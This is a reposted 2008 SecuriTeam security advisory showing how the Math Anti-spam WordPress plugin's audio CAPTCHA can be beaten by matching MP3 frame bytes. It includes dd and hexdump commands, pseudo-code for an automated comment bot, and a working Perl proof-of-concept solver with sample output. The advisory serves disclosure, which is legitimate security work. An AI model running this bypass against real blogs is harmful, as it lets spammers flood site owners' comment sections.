Search This Blog

Tuesday, January 15, 2008

[NEWS] Defeating Math Antispam Protection Plugin for Wordpress

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


- - - - - - - - -

Defeating Math Antispam Protection Plugin for Wordpress
------------------------------------------------------------------------


SUMMARY

The plugin <http://www.theblog.ca/math-anti-spam> Math Anti-spam consists
of "a simple equation you must be able to solve in order to enter comments
to a post. The equation is displayed as an image in a randomized color,
font and position. An alternative to the image you can by clicking on the
image, you download an audio mp3 clip that reads the equation for you".
This audio clip is always the same voice, which is not randomly distorted
or any other obfuscation method is applied.

The following illustrates how the Math Anti-spam mechanism can be easily
subverted by preforming file comparison on the audio files.

DETAILS

Though mp3 specifications are not freely distributed, a brief description
can be found here:
<http://www.mp3-tech.org/programmer/frame_header.html>

http://www.mp3-tech.org/programmer/frame_header.html

An mp3 file consists on an optional header for IDTags (this is where you
find information about the clip such as the song name, artist, etc...)
followed by what are called mpeg frames.

Frames are displayed sequentially, one after the other, and the
information that they contain is also sequential. This means that you can
start playing an mpeg file before reading its entire contents as the
information contained by the first frame is followed by the second and so
on. It also means that frames have a meaning on themselves, and you can
strip some frames from a file and play them independently.

Typically, all the headers in a file are the same. From the above URL,
this is the explanation of the frame headers found in the mp3 files
generated by the plugin:

FF F3 44 C4 : 1111 1111 1111 0011 0100 0100 1100 0100 (This string
happens to be D in ASCII. Feel the force, geek! :-))

1111 1111 111: Frame sync (all bits must be set)
1 0: MPEG Version 2 (ISO/IEC 13818-3)
01: Layer III
1: Not protected
0100: 32 kbps Bitrate index
01: 24000 Hz Sampling rate frequency index
0: frame is not padded
0: Private bit. This one is only informative.
11: Single channel (Mono)
00: Intensity stereo Off, MS stereo Off
0: Audio is not copyrighted
1: Original media
00: Emphasis none

Comparing files with equations "1+4" and "1+5", you can see that:

- Both have first frame starting at byte 0x00. No IDTags

- Both have their frames 192 bytes long (including header) until byte
0x0f60, where a 51 bytes long frame is found. Then again, at frame 0x0f8f,
size starts being 192 bytes again, until byte 0x2c0f, where a 132 bytes
long frame is found. Then again, at frame 0x2c54, frame size starts being
192 bytes long again until the contents seems to end (with a last smaller
frame at the end).

- Both have exactly the same contents up to byte 0x2c62. Frame
corresponding to this position starts at 0x2c54.

Jose would bet that contents from 0x0000 to 0x0f8e have the spoken word
"1", from 0x0fef to 0x2c53 have the spoken word "+" and from 0x2c54 on
have the spoken words "4" and "5" (one for each file).

Lets take a quick look to a "6+6" sample:
- No ID-Tags information, first frame starts at byte 0x00.

- Frames are 192 bytes long until position 0x1320, where a 53 bytes long
frame exists. I would say that this means the spoken word "6".

- At 0x1355 192 bytes long frames start again until 0x2fd5, where there's
a 133 bytes long frame. Maybe the spoken word "+"?

- At 0x301a frames start being 192 bytes long again until the contents
seems to end (with a last smaller frame at the end). Will this be another
spoken word "6"?

Would you be surprised if 0x0f8f to 0x2c53 (7364 bytes) from "1+4" or
"1+5" ecuations (that we know are the same) had the same contents as
0x1355 to 0x3019 (7364 bytes) from "6+6" ecuation? The spoken word "+"
maybe?

And what about 0x0000 to 0x1354 (4948 bytes) being the same as 0x301a to
0x436e (4948 bytes), both from file "6+6" and meaning the spoken word "6"?

Next step is downloading the plugin (
<http://www.theblog.ca/math-anti-spam>

http://www.theblog.ca/math-anti-spam), navigate to the directory
math-anti-spam/sounds and get all the audio clips for numbers 1, 2,
3....,9.

If we wouldn't have had access to that information, we could have also
obtained the numbers by downloading enough samples to have the all
numbers, save the audio clips with a descriptive filename and split the
digits dumping the contents in different files:

$ dd if=onePlusFour.mp3 of=one.mp3 bs=1 count=3983
$ dd if=ninePlusTwo.mp3 of=two.mp3 bs=1 skip=12374
...

Now, which is the minimum amount of information needed to differentiate
sounds from each other?

$ for i in `ls -l|awk '{print $9}'`; do echo $i; hexdump $i |head -1; done
0.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 0045
1.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 00c5
2.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 0485
3.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 4309
4.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 0205
5.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 0847
6.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0009 0601
7.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 0644
8.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 0405
9.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 0031
plus.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 0a45

It seems that bytes 14 and 15 (starting the count at 0) are always
different for each sound.

What do you think about this pseudo-code:

1) Ask the user for the URL of the wordpress post protected by math
anti-spam
2) Crawl the xhtml contents for the link to the audio clip (look for
audioselect=ID)
3) Get the mp3 clip (word.mp3)
4) Check bytes 14 and 15 of the clip to see which number matches (0 to 9)
5) Position cursor on clip to the size of the matching number + size of
the plus clip +1
6) Check bytes 14 and 15 of the clip from the step 5 offset to see which
number matches (0 to 9)
7) eval() the equation 'result from step 4' + 'result from step 6'
8) post the comment with the eval()uated equation result.

And the size of the clips is something that we already know:

$ ls -l math-anti-spam/sounds/
total 160
-rw-r--r-- 1 palako palako 4045 Aug 6 13:30 0.mp3
-rw-r--r-- 1 palako palako 3983 Aug 6 13:30 1.mp3
-rw-r--r-- 1 palako palako 4431 Aug 6 13:30 2.mp3
-rw-r--r-- 1 palako palako 4250 Aug 6 13:30 3.mp3
-rw-r--r-- 1 palako palako 4595 Aug 6 13:30 4.mp3
-rw-r--r-- 1 palako palako 5389 Aug 6 13:30 5.mp3
-rw-r--r-- 1 palako palako 4949 Aug 6 13:30 6.mp3
-rw-r--r-- 1 palako palako 4436 Aug 6 13:30 7.mp3
-rw-r--r-- 1 palako palako 4584 Aug 6 13:30 8.mp3
-rw-r--r-- 1 palako palako 5009 Aug 6 13:30 9.mp3
-rw-r--r-- 1 palako palako 7365 Aug 28 21:54 plus.mp3

As a proof of concept, here is the implementation for steps 4 to 7.
Trivial implementation of the other steps is left for.

Exploit:
#!/usr/bin/perl -w

require bytes;

my $buffer;
my $number;
my $op1;
my $op2;

my %numberPrints = ("0045", 0,
"00c5", 1,
"0485", 2,
"4309", 3,
"0205", 4,
"0847", 5,
"0601", 6,
"0644", 7,
"0405", 8,
"0031", 9);

my %numberSizes = ( 0, 4045,
1, 3983,
2, 4431,
3, 4250,
4, 4595,
5, 5389,
6, 4949,
7, 4436,
8, 4584,
9, 5009);

my $PLUS_SIZE = 7365;

open (INFILE, "<$ARGV[0]");
binmode(INFILE);
sysseek(INFILE, 14, 0); #That "0" third argument makes seeking
absoulte
sysread(INFILE, $buffer, 2);
#$number = sprintf("%x%x", map {ord($_)}
split(//,substr($buffer,0,2)));
$number = sprintf("%.2x%.2x", map {ord($_)} split(//,$buffer));
$op1 = $numberPrints{$number};
sysseek(INFILE, $numberSizes{$op1} + $PLUS_SIZE - 2, 1); #That
third "1" argument makes seeking relative
sysread(INFILE, $buffer, 2);
$number = sprintf("%.2x%.2x", map {ord($_)} split(//,$buffer));
$op2 = $numberPrints{$number};
print $op1 . " + " . $op2 . " = " . ($op1+$op2) . "\n";
close(INFILE);

Check it against some samples:

$ ls -l samples/
total 304
-rw-r--r-- 1 palako palako 15943 Jan 8 07:14 1+4.mp3
-rw-r--r-- 1 palako palako 16745 Jan 8 07:10 2+6.mp3
-rw-r--r-- 1 palako palako 16745 Jan 8 07:07 6+2.mp3
-rw-r--r-- 1 palako palako 16898 Jan 8 07:02 6+8.mp3
-rw-r--r-- 1 palako palako 16750 Jan 8 07:08 7+6.mp3
-rw-r--r-- 1 palako palako 16385 Jan 8 07:12 7+8.mp3
-rw-r--r-- 1 palako palako 16380 Jan 8 07:06 8+2.mp3
-rw-r--r-- 1 palako palako 16958 Jan 8 07:09 9+8.mp3

$ for sample in `ls -l samples/|awk '{print $9}'`; do ./math_spam.pl
samples/$sample; done
1 + 4 = 5
2 + 6 = 8
6 + 2 = 8
6 + 8 = 14
7 + 6 = 13
7 + 8 = 15
8 + 2 = 10
9 + 8 = 17


ADDITIONAL INFORMATION

The information has been provided by <mailto:josem.palazon@gmail.com>
Jose Palazon (a.k.a. palako).
The original article can be found at:
<http://docs.google.com/View?docid=df36cd52_19xzmkwqcg>

http://docs.google.com/View?docid=df36cd52_19xzmkwqcg

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

No comments: